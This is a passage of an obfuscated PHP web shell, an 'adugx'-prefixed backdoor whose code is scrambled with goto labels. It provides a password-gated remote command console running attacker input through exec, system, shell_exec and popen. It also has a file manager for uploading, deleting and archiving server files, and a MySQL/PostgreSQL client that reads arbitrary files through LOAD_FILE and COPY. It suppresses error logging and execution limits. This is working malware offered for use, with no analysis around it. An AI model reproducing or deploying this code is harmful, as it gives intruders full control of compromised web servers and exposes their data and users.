pre{font-family:Courier,Monospace;}
</style>
<script>
var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
var a_ = '" . htmlspecialchars(@$_POST['a']) . "'
var charset_ = '" . htmlspecialchars(@$_POST['charset']) . "';
var p1_ = '" . (strpos(@$_POST['p1'], "
") !== false ? '' : htmlspecialchars($_POST['p1'], ENT_QUOTES)) . "';
var p2_ = '" . (strpos(@$_POST['p2'], "
") !== false ? '' : htmlspecialchars($_POST['p2'], ENT_QUOTES)) . "';
var p3_ = '" . (strpos(@$_POST['p3'], "
") !== false ? '' : htmlspecialchars($_POST['p3'], ENT_QUOTES)) . "';
var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
//if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" . addslashes($_SERVER['REQUEST_URI']) . "', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\\d+)([\\S\\s]*)\", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>"; goto B51cd; c2a99: foreach ($m as $k => $v) { $menu .= '<th width="' . (int) (100 / count($m)) . '%">[ <a href="#" onclick="g(\'' . $v . '\',null,\'\',\'\',\'\')">' . $k . '</a> ]</th>'; Ae6ff: } goto cf9fe; Dc2c0: } goto d5931; a7e92: if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) { $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool) $default_use_ajax; } goto E92e7; E1797: if (!function_exists("posix_getgrgid") && strpos($GLOBALS['disable_functions'], 'posix_getgrgid') === false) { function posix_getgrgid($p) { return false; } } goto c7b2c; dc40e: function adugxScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { goto F8bb8; D9e82: if (!(false !== ($filename = readdir($dh)))) { goto b56fa; } goto feed4; feed4: $files[] = $filename; goto B8023; F8bb8: $dh = opendir($dir); goto Ec07a; Ec07a: D2368: goto D9e82; e5038: b56fa: goto A014a; A014a: return $files; goto b4c45; B8023: goto D2368; goto e5038; b4c45: } } goto d5d0e; Ee2ae: function adugxLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } goto a53c8; b2806: @set_time_limit(0); goto Bf534; a53c8: function adugxsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto Abd9c; f4fd4: function adugxPermsColor($f) { if (!@is_readable($f)) { return '<font color=#FF0000>' . adugxPerms(@fileperms($f)) . '</font>'; } elseif (!@is_writable($f)) { return '<font color=white>' . adugxPerms(@fileperms($f)) . '</font>'; } else { return '<font color=#25ff00>' . adugxPerms(@fileperms($f)) . '</font>'; } } goto dc40e; d5d0e: function adugxWhich($p) { goto C2075; fccff: if (!empty($path)) { return $path; } goto C094c; C094c: return false; goto B0b3e; C2075: $path = adugxEx('which ' . $p); goto fccff; B0b3e: } goto ebd9f; d9dfc: $color = "#df5"; goto Cf1bb; dc9a6: @ini_set('error_log', NULL); goto B0e97; effb0: function actionConsole() { goto A982a; C3ff3: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto e221e; db22c: echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 ' . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX <input type=checkbox name=show_errors value=1 ' . (!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'stderr_to_out'] ? 'checked' : '') . '> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; goto D6d18; Ed407: foreach ($GLOBALS['aliases'] as $n => $v) { goto Eb99b; Eb99b: if ($v == '') { echo '<optgroup label="-' . htmlspecialchars($n) . '-"></optgroup>'; goto cd63a; } goto f67ad; f67ad: echo '<option value="' . htmlspecialchars($v) . '">' . $n . '</option>'; goto a5ff9; a5ff9: cd63a: goto d1d9b; d1d9b: } goto E80b3; b957a: echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur--;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push('');
cur = cmds.length-1;
}
</script>"; goto C4055; A982a: if (!empty($_POST['p1']) && !empty($_POST['p2'])) { adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif (!empty($_POST['p1'])) { adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'stderr_to_out', 0); } goto Af3b6; C4055: echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; goto Ed407; D6d18: if (!empty($_POST['p1'])) { echo htmlspecialchars("\$ " . $_POST['p1'] . "
" . adugxEx($_POST['p1'])); } goto A20f1; Af3b6: if (isset($_POST['ajax'])) { goto A3793; a484a: echo "d.cf.cmd.value='';
"; goto b7b4d; Bb506: echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; goto c18af; F0cf8: ob_start(); goto a484a; F4082: echo strlen($temp), "
", $temp; goto E50b1; b7b4d: $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("
\$ " . $_POST['p1'] . "
" . adugxEx($_POST['p1']), "
\'")); goto C680d; A3793: adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto F0cf8; Ce0c3: echo "d.cf.output.value+='" . $temp . "';"; goto Bb506; C680d: if (preg_match("!.*cd\s+([^;]+)\$!", $_POST['p1'], $match)) { if (@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='" . $GLOBALS['cwd'] . "';"; } } goto Ce0c3; c18af: $temp = ob_get_clean(); goto F4082; E50b1: exit; goto c006a; c006a: } goto C3ff3; A20f1: echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; goto d9171; d9171: echo '</form></div><script>d.cf.cmd.focus();</script>'; goto Dbe21; e221e: adugxHeader(); goto b957a; E80b3: F8d61: goto db22c; Dbe21: adugxFooter(); goto Dd58d; Dd58d: } goto C8ab3; A0e71: $default_charset = 'Windows-1251'; goto Bbf18; E93f8: $cwd = @getcwd(); goto Ef27f; d6fdb: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = 'win'; } else { $os = 'nix'; } goto A9095; c4a11: function actionFilesMan() { goto Afc93; D9dd1: usort($files, "adugxCmp"); goto A186b; ac49a: $l = 0; goto c1ab3; Abb5b: if (!empty($_COOKIE['act']) && @count($_COOKIE['f'])) { echo "<option value='paste'>Paste / Compress</option>"; } goto Ac4de; b34cd: if (@is_file($GLOBALS['cwd'] . $dirContent[$i])) { $files[] = array_merge($tmp, array('type' => 'file')); } elseif (@is_link($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); } elseif (@is_dir($GLOBALS['cwd'] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array('type' => 'dir')); } goto Ec00a; a2019: $files = array_merge($dirs, $files); goto ac49a; Ec00a: c9300: goto B33fb; ce534: echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; goto A59b8; B2091: $i = 0; goto Cadae; Ff700: Adbe7: goto bdbf0; D1378: $dirs = $files = array(); goto e0629; ad6f4: echo "<option value='tar'>Compress (tar.gz)</option>"; goto Abb5b; C3520: echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; goto dce8e; a8666: $gr = @posix_getgrgid(@filegroup($dirContent[$i])); goto C6cc5; Dea04: if ($dirContent === false) { goto a1450; a1450: echo 'Can\'t open this folder!'; goto E467f; D7139: return; goto e1454; E467f: adugxFooter(); goto D7139; e1454: } goto d140c; Afc6c: goto Eead3; goto Ff700; a5db8: function adugxCmp($a, $b) { if ($GLOBALS['sort'][0] != 'size') { return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1] ? 1 : -1); } else { return ($a['size'] < $b['size'] ? -1 : 1) * ($GLOBALS['sort'][1] ? 1 : -1); } } goto D9dd1; C9bf0: B3d7c: goto ce534; c3738: adugxFooter(); goto f810e; c7b3f: adugxHeader(); goto C3520; B33fb: $i++; goto Afc6c; A186b: usort($dirs, "adugxCmp"); goto a2019; e0629: $n = count($dirContent); goto B2091; Ac4de: echo "</select> "; goto Db435; f7788: echo "<script>
function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_" . ($sort[1] ? 0 : 1) . "\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_" . ($sort[1] ? 0 : 1) . "\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_" . ($sort[1] ? 0 : 1) . "\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_" . ($sort[1] ? 0 : 1) . "\")'>Permissions</a></th><th>Actions</th></tr>"; goto D1378; Db435: if (!empty($_COOKIE['act']) && @count($_COOKIE['f']) && ($_COOKIE['act'] == 'zip' || $_COOKIE['act'] == 'tar')) { echo "file name: <input type=text name=p2 value='adugx_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip' ? 'zip' : 'tar.gz') . "'> "; } goto F0a4e; c1ab3: foreach ($files as $f) { goto Fe4b3; Fe4b3: echo '<tr' . ($l ? ' class=l1' : '') . '><td><input type=checkbox name="f[]" value="' . urlencode($f['name']) . '" class=chkbx></td><td><a href=# onclick="' . ($f['type'] == 'file' ? 'g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'view\')">' . htmlspecialchars($f['name']) : 'g(\'FilesMan\',\'' . $f['path'] . '\');" ' . (empty($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>') . '</a></td><td>' . ($f['type'] == 'file' ? adugxViewSize($f['size']) : $f['type']) . '</td><td>' . $f['modify'] . '</td><td>' . $f['owner'] . '/' . $f['group'] . '</td><td><a href=# onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\',\'chmod\')">' . $f['perms'] . '</td><td><a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'touch\')">T</a>' . ($f['type'] == 'file' ? ' <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\'' . urlencode($f['name']) . '\', \'download\')">D</a>' : '') . '</td></tr>'; goto e9f98; E9a2b: Ea52d: goto d38f7; e9f98: $l = $l ? 0 : 1; goto E9a2b; d38f7: } goto C9bf0; dce8e: $dirContent = adugxScandir(isset($_POST['c']) ? $_POST['c'] : $GLOBALS['cwd']); goto Dea04; Cadae: Eead3: goto ef2c7; Bdb79: if (!empty($_POST['p1'])) { goto c287f; F5beb: a3f21: goto F54a9; F54a9: C45aa: goto de716; c287f: switch ($_POST['p1']) { case 'uploadFile': if (!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) { echo "Can't upload file!"; } goto C45aa; case 'mkdir': if (!@mkdir($_POST['p2'])) { echo "Can't create new dir"; } goto C45aa; case 'delete': goto b3441; D2c3b: if (is_array(@$_POST['f'])) { foreach ($_POST['f'] as $f) { goto F829a; a2e6d: if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } goto b09d0; A82aa: $f = urldecode($f); goto a2e6d; F829a: if ($f == '..') { goto ff58d; } goto A82aa; b09d0: ff58d: goto Ab9d7; Ab9d7: } D59f3: } goto E0d69; E0d69: goto C45aa; goto Bb7b1; b3441: function deleteDir($path) { goto b6d80; b6d80: $path = substr($path, -1) == '/' ? $path : $path . '/'; goto C5b7a; Ce387: if ($type == "dir") { deleteDir($item); } else { @unlink($item); } goto bcdb3; Ab71c: if (basename($item) == ".." || basename($item) == ".") { goto E8a70; } goto Ed035; bcdb3: goto E8a70; goto F7ea4; Ed035: $type = filetype($item); goto Ce387; A2a60: @rmdir($path); goto f943f; F7ea4: C69c1: goto Ae454; b23ad: E8a70: goto c14c4; Ae454: closedir($dh); goto A2a60; B5fb4: $item = $path . $item; goto Ab71c; c14c4: if (!(($item = readdir($dh)) !== false)) { goto C69c1; } goto B5fb4; C5b7a: $dh = opendir($path); goto b23ad; f943f: } goto D2c3b; Bb7b1: case 'paste': goto fc9ac; fd37a: setcookie('f', '', time() - 3600); goto C9cd2; C9cd2: goto C45aa; goto C1e9e; fc9ac: if ($_COOKIE['act'] == 'copy') { goto B5186; B5186: function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { goto B0b68; B0b68: mkdir($d . $s); goto B5617; D795c: goto Ef4d3; goto A0700; b9335: Ef4d3: goto Fb437; A0700: Dd696: goto Ef4b3; Fb437: if (!(($f = @readdir($h)) !== false)) { goto Dd696; } goto Dac55; B5617: $h = @opendir($c . $s); goto b9335; Dac55: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto D795c; Ef4b3: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto C1f94; B9523: c21e9: goto Acd52; C1f94: foreach ($_COOKIE['f'] as $f) { copy_paste($_COOKIE['c'], $f, $GLOBALS['cwd']); Ff36e: } goto B9523; Acd52: } elseif ($_COOKIE['act'] == 'move') { goto E0a2f; f27a5: C494d: goto a41f7; E0a2f: function move_paste($c, $s, $d) { if (is_dir($c . $s)) { goto d330f; b6fa7: eac4b: goto dc9a1; d2333: D31fc: goto A1652; C5460: goto eac4b; goto d2333; dc9a1: if (!(($f = @readdir($h)) !== false)) { goto D31fc; } goto C5c25; d330f: mkdir($d . $s); goto Fabd2; C5c25: if ($f != "." and $f != "..") { copy_paste($c . $s . '/', $f, $d . $s . '/'); } goto C5460; Fabd2: $h = @opendir($c . $s); goto b6fa7; A1652: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto E0887; E0887: foreach ($_COOKIE['f'] as $f) { @rename($_COOKIE['c'] . $f, $GLOBALS['cwd'] . $f); d5dc1: } goto f27a5; a41f7: } elseif ($_COOKIE['act'] == 'zip') { if (class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { goto A7d02; b25ce: F145c: goto Cada9; A7d02: chdir($_COOKIE['c']); goto B35e0; B1607: $zip->close(); goto c3092; Cada9: chdir($GLOBALS['cwd']); goto B1607; B35e0: foreach ($_COOKIE['f'] as $f) { goto b2002; d11d3: fff82: goto b8a4c; A2a5c: if (@is_file($_COOKIE['c'] . $f)) { $zip->addFile($_COOKIE['c'] . $f, $f); } elseif (@is_dir($_COOKIE['c'] . $f)) { goto E31e5; E31e5: $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . '/', FilesystemIterator::SKIP_DOTS)); goto Ec11e; Ec11e: foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); fdc67: } goto c1da1; c1da1: E8bdb: goto F9f19; F9f19: } goto d11d3; b2002: if ($f == '..') { goto fff82; } goto A2a5c; b8a4c: } goto b25ce; c3092: } } } elseif ($_COOKIE['act'] == 'unzip') { if (class_exists('ZipArchive')) { goto ef86b; e0eef: fb072: goto a2a7b; d147c: foreach ($_COOKIE['f'] as $f) { if ($zip->open($_COOKIE['c'] . $f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } ca972: } goto e0eef; ef86b: $zip = new ZipArchive(); goto d147c; a2a7b: } } elseif ($_COOKIE['act'] == 'tar') { goto F21b0; F4e08: $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); goto f9d04; F21b0: chdir($_COOKIE['c']); goto F4e08; F5b0b: chdir($GLOBALS['cwd']); goto f649a; f9d04: adugxEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); goto F5b0b; f649a: } goto E863e; E863e: unset($_COOKIE['f']); goto fd37a; C1e9e: default: if (!empty($_POST['p1'])) { goto E4631; E4631: adugxsetcookie('act', $_POST['p1']); goto Ffc52; Ffc52: adugxsetcookie('f', serialize(@$_POST['f'])); goto C5b7b; C5b7b: adugxsetcookie('c', @$_POST['c']); goto f09a5; f09a5: } goto C45aa; } goto F5beb; de716: } goto c7b3f; f7a93: $ow = @posix_getpwuid(@fileowner($dirContent[$i])); goto a8666; C6cc5: $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'] . $dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => adugxPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'] . $dirContent[$i]), 'owner' => $ow['name'] ? $ow['name'] : @fileowner($dirContent[$i]), 'group' => $gr['name'] ? $gr['name'] : @filegroup($dirContent[$i])); goto b34cd; Afc93: if (!empty($_COOKIE['f'])) { $_COOKIE['f'] = @unserialize($_COOKIE['f']); } goto Bdb79; A59b8: if (class_exists('ZipArchive')) { echo "<option value='zip'>Compress (zip)</option><option value='unzip' selected>Uncompress (unzip)</option>"; } goto ad6f4; B2ef8: if (!empty($_POST['p1'])) { if (preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) { $sort = array($match[1], (int) $match[2]); } } goto f7788; ef2c7: if (!($i < $n)) { goto Adbe7; } goto f7a93; F0a4e: echo "<input type='submit' value='>>'></td></tr></form></table></div>"; goto c3738; efc75: $sort = array('name', 1); goto B2ef8; bdbf0: $GLOBALS['sort'] = $sort; goto a5db8; d140c: global $sort; goto efc75; f810e: } goto Ce628; C8ab3: function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } goto E5a36; d5931: function adugxFooter() { $is_writable = is_writable($GLOBALS['cwd']) ? " <font color='green'>(Writeable)</font>" : " <font color=red>(Not writable)</font>"; echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>{$is_writable}<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>{$is_writable}<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='" . $GLOBALS['cwd'] . "'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<span>Upload file:</span>{$is_writable}<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
</tr></table></div></body></html>"; } goto cdc37; b500f: function adugxViewSize($s) { if (is_int($s)) { $s = sprintf("%u", $s); } if ($s >= 1073741824) { return sprintf('%1.2f', $s / 1073741824) . ' GB'; } elseif ($s >= 1048576) { return sprintf('%1.2f', $s / 1048576) . ' MB'; } elseif ($s >= 1024) { return sprintf('%1.2f', $s / 1024) . ' KB'; } else { return $s . ' B'; } } goto aaa81; e1f11: if (isset($_POST['c'])) { @chdir($_POST['c']); } goto E93f8; Fbcf5: if ($cwd[strlen($cwd) - 1] != '/') { $cwd .= '/'; } goto a7e92; Ef27f: if ($os == 'win') { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto Fbcf5; e44a6: error_reporting(0); goto ee956; f4602: @ini_set('max_execution_time', 0); goto b2806; c7b2c: function adugxEx($in) { goto Ea458; d98d1: if (function_exists('exec')) { @exec($in, $out); $out = @join("
", $out); } elseif (function_exists('passthru')) { goto B9753; Df21c: @passthru($in); goto Fafdf; B9753: ob_start(); goto Df21c; Fafdf: $out = ob_get_clean(); goto F24f9; F24f9: } elseif (function_exists('system')) { goto D2920; b00e0: $out = ob_get_clean(); goto Bc2c2; c244c: @system($in); goto b00e0; D2920: ob_start(); goto c244c; Bc2c2: } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { goto E9df9; d4dc6: pclose($f); goto dd388; d655e: Bad55: goto d4dc6; b3bec: e625b: goto ee3ac; b4788: $out .= fread($f, 1024); goto C2a6e; E9df9: $out = ""; goto b3bec; C2a6e: goto e625b; goto d655e; ee3ac: if (@feof($f)) { goto Bad55; } goto b4788; dd388: } goto D037c; D037c: return $out; goto fffd7; Ea458: $out = ''; goto d98d1; fffd7: } goto b500f; de4e7: $default_use_ajax = true; goto A0e71; D0149: function actionSql() { goto b718e; b9260: echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>
<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>
<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>"; goto Cb28d; C3e0e: echo "</td>
<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
<td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>
</tr>
</table>
<script>
s_db='" . @addslashes($_POST['sql_base']) . "';
function fs(f) {
if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
if(f.p1) f.p1.value='';
if(f.p2) f.p2.value='';
if(f.p3) f.p3.value='';
}
}
function st(t,l) {
d.sf.p1.value = 'select';
d.sf.p2.value = t;
if(l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit();
}
function is() {
for(i=0;i<d.sf.elements['tbl[]'].length;++i)
d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
}
</script>"; goto Facdd; Cb28d: $tmp = "<input type=text name=sql_base value=''>"; goto C86f1; b718e: class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { goto e0020; f9803: ea815: goto Dad58; e0020: switch ($this->type) { case 'mysql': if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } goto ea815; case 'pgsql': goto a342f; Fa6fb: goto ea815; goto Fcb1c; e875b: if (!$host[1]) { $host[1] = 5432; } goto e54e7; e54e7: if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } goto Fa6fb; a342f: $host = explode(':', $host); goto e875b; Fcb1c: } goto da292; da292: B1032: goto f9803; Dad58: return false; goto B877e; B877e: } function selectdb($db) { goto cacef; e80c3: a98b2: goto Ac5f4; D4b49: bbc80: goto e80c3; cacef: switch ($this->type) { case 'mysql': if (@mysql_select_db($db)) { return true; } goto a98b2; } goto D4b49; Ac5f4: return false; goto a2df5; a2df5: } function query($str) { goto c04cc; Fe7b8: return false; goto f4578; b3267: dae40: goto d278c; d278c: dc5ce: goto Fe7b8; c04cc: switch ($this->type) { case 'mysql': return $this->res = @mysql_query($str); goto dc5ce; case 'pgsql': return $this->res = @pg_query($this->link, $str); goto dc5ce; } goto b3267; f4578: } function fetch() { goto Be421; bc67f: switch ($this->type) { case 'mysql': return @mysql_fetch_assoc($res); goto E61af; case 'pgsql': return @pg_fetch_assoc($res); goto E61af; } goto F1965; E5db7: return false; goto Ff44a; C211e: E61af: goto E5db7; Be421: $res = func_num_args() ? func_get_arg(0) : $this->res; goto bc67f; F1965: F8b9c: goto C211e; Ff44a: } function listDbs() { goto Eae73; Ef9de: return false; goto c7c4a; db3f4: b3fa5: goto Ef9de; Eae73: switch ($this->type) { case 'mysql': return $this->query("SHOW databases"); goto b3fa5; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); goto b3fa5; } goto D2b92; D2b92: ae499: goto db3f4; c7c4a: } function listTables() { goto B8b89; D8aaf: return false; goto a9d9b; A1e6b: af156: goto D8aaf; E9b30: e24e9: goto A1e6b; B8b89: switch ($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); goto af156; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); goto af156; } goto E9b30; a9d9b: } function error() { goto db666; f56e3: da5f8: goto E0eca; fb8dc: return false; goto a8464; db666: switch ($this->type) { case 'mysql': return @mysql_error(); goto A4206; case 'pgsql': return @pg_last_error(); goto A4206; } goto f56e3; E0eca: A4206: goto fb8dc; a8464: } function setCharset($str) { goto C4bf2; B1209: Bca63: goto e5dbc; e5dbc: return false; goto A56ce; a1585: Cae95: goto B1209; C4bf2: switch ($this->type) { case 'mysql': if (function_exists('mysql_set_charset')) { return @mysql_set_charset($str, $this->link); } else { $this->query('SET CHARSET ' . $str); } goto Bca63; case 'pgsql': return @pg_set_client_encoding($this->link, $str); goto Bca63; } goto a1585; A56ce: } function loadFile($str) { goto e8826; e8826: switch ($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); goto a99a5; case 'pgsql': goto B0f2e; B25cd: if (!($i = $this->fetch())) { goto c0de7; } goto e3de3; B0f2e: $this->query("CREATE TABLE adugx2(file text);COPY adugx2 FROM '" . addslashes($str) . "';select file from adugx2;"); goto f44e8; e3de3: $r[] = $i['file']; goto B2ac9; B2ac9: goto b6787; goto f51bf; Bf7bb: return array('file' => implode("
", $r)); goto d946e; d2e40: $this->query('drop table adugx2'); goto Bf7bb; f51bf: c0de7: goto d2e40; Ca844: b6787: goto B25cd; d946e: goto a99a5; goto aacc4; f44e8: $r = array(); goto Ca844; aacc4: } goto b4fc7; d8c42: a99a5: goto A8b2a; A8b2a: return false; goto D21f4; b4fc7: Fd014: goto d8c42; D21f4: } function dump($table, $fp = false) { goto Dd16f; Bc1d6: f12e7: goto da6fe; da6fe: d9583: goto f3fc8; f3fc8: return false; goto fc0e3; Dd16f: switch ($this->type) { case 'mysql': goto f3f1e; D5621: $i = 0; goto e721f; c260f: $sql = $create[1] . ";
